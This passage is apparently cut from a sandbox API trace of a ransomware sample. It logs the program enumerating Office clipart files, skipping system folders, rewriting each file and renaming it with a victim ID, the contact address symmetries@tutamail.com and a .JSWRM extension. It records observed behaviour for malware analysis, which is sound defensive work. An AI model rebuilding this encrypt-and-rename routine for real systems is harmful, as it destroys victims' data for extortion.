office\\root\\clipart\\pub60cor\\so02578_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0097.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0097.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0097.880] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5fec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02617_.WMF", cAlternateFileName="")) returned 1 [0097.880] lstrcmpiW (lpString1="SO02617_.WMF", lpString2=".") returned 1 [0097.880] lstrcmpiW (lpString1="SO02617_.WMF", lpString2="..") returned 1 [0097.880] lstrcmpiW (lpString1="SO02617_.WMF", lpString2="...") returned 1 [0097.881] lstrcmpiW (lpString1="SO02617_.WMF", lpString2="windows") returned -1 [0097.881] lstrcmpiW (lpString1="SO02617_.WMF", lpString2="recovery") returned 1 [0097.881] lstrcmpiW (lpString1="SO02617_.WMF", lpString2="perflogs") returned 1 [0097.881] lstrcmpiW (lpString1="SO02617_.WMF", lpString2="documents and settings") returned 1 [0097.881] lstrcmpiW (lpString1="SO02617_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.881] lstrcmpiW (lpString1="SO02617_.WMF", lpString2="system volume information") returned -1 [0097.881] lstrcmpiW (lpString1="SO02617_.WMF", lpString2="msocache") returned 1 [0097.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0097.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02617_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02617_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02617_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0097.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0097.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02617_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02617_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02617_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0097.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0097.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0097.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0097.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02617_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02617_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.882] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24556) returned 1 [0097.882] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5fe0) returned 0x24d210 [0097.882] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5fe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5fe0, lpOverlapped=0x0) returned 1 [0097.885] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.885] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5fe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5fe0, lpOverlapped=0x0) returned 1 [0097.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.886] CloseHandle (hObject=0x314) returned 1 [0097.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0097.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0097.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0097.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0097.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0097.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0097.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0097.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0097.886] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02617_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02617_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02617_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02617_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0097.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0097.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0097.887] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7f4e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02790_.WMF", cAlternateFileName="")) returned 1 [0097.887] lstrcmpiW (lpString1="SO02790_.WMF", lpString2=".") returned 1 [0097.887] lstrcmpiW (lpString1="SO02790_.WMF", lpString2="..") returned 1 [0097.887] lstrcmpiW (lpString1="SO02790_.WMF", lpString2="...") returned 1 [0097.887] lstrcmpiW (lpString1="SO02790_.WMF", lpString2="windows") returned -1 [0097.887] lstrcmpiW (lpString1="SO02790_.WMF", lpString2="recovery") returned 1 [0097.887] lstrcmpiW (lpString1="SO02790_.WMF", lpString2="perflogs") returned 1 [0097.887] lstrcmpiW (lpString1="SO02790_.WMF", lpString2="documents and settings") returned 1 [0097.887] lstrcmpiW (lpString1="SO02790_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.887] lstrcmpiW (lpString1="SO02790_.WMF", lpString2="system volume information") returned -1 [0097.887] lstrcmpiW (lpString1="SO02790_.WMF", lpString2="msocache") returned 1 [0097.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0097.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02790_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02790_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02790_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0097.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0097.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02790_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02790_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02790_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0097.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0097.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0097.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0097.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02790_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.888] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32590) returned 1 [0097.888] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7f40) returned 0x24d210 [0097.888] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7f40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7f40, lpOverlapped=0x0) returned 1 [0097.892] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.892] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7f40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7f40, lpOverlapped=0x0) returned 1 [0097.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.893] CloseHandle (hObject=0x314) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0097.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0097.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0097.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0097.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0097.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0097.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.894] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02790_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02790_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02790_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0097.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0097.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0097.895] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x430c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02791_.WMF", cAlternateFileName="")) returned 1 [0097.895] lstrcmpiW (lpString1="SO02791_.WMF", lpString2=".") returned 1 [0097.895] lstrcmpiW (lpString1="SO02791_.WMF", lpString2="..") returned 1 [0097.895] lstrcmpiW (lpString1="SO02791_.WMF", lpString2="...") returned 1 [0097.895] lstrcmpiW (lpString1="SO02791_.WMF", lpString2="windows") returned -1 [0097.895] lstrcmpiW (lpString1="SO02791_.WMF", lpString2="recovery") returned 1 [0097.895] lstrcmpiW (lpString1="SO02791_.WMF", lpString2="perflogs") returned 1 [0097.895] lstrcmpiW (lpString1="SO02791_.WMF", lpString2="documents and settings") returned 1 [0097.895] lstrcmpiW (lpString1="SO02791_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.895] lstrcmpiW (lpString1="SO02791_.WMF", lpString2="system volume information") returned -1 [0097.895] lstrcmpiW (lpString1="SO02791_.WMF", lpString2="msocache") returned 1 [0097.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0097.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02791_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02791_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02791_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0097.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0097.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02791_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02791_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02791_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0097.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0097.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0097.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0097.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02791_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02791_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.896] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17164) returned 1 [0097.896] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4300) returned 0x24d210 [0097.897] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4300, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4300, lpOverlapped=0x0) returned 1 [0098.127] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.127] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4300, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4300, lpOverlapped=0x0) returned 1 [0098.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.127] CloseHandle (hObject=0x314) returned 1 [0098.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0098.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0098.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0098.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0098.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0098.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0098.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0098.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0098.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.128] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02791_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02791_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02791_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02791_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0098.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0098.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0098.129] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5b70, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02793_.WMF", cAlternateFileName="")) returned 1 [0098.129] lstrcmpiW (lpString1="SO02793_.WMF", lpString2=".") returned 1 [0098.130] lstrcmpiW (lpString1="SO02793_.WMF", lpString2="..") returned 1 [0098.130] lstrcmpiW (lpString1="SO02793_.WMF", lpString2="...") returned 1 [0098.130] lstrcmpiW (lpString1="SO02793_.WMF", lpString2="windows") returned -1 [0098.130] lstrcmpiW (lpString1="SO02793_.WMF", lpString2="recovery") returned 1 [0098.130] lstrcmpiW (lpString1="SO02793_.WMF", lpString2="perflogs") returned 1 [0098.130] lstrcmpiW (lpString1="SO02793_.WMF", lpString2="documents and settings") returned 1 [0098.130] lstrcmpiW (lpString1="SO02793_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.130] lstrcmpiW (lpString1="SO02793_.WMF", lpString2="system volume information") returned -1 [0098.130] lstrcmpiW (lpString1="SO02793_.WMF", lpString2="msocache") returned 1 [0098.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0098.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02793_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 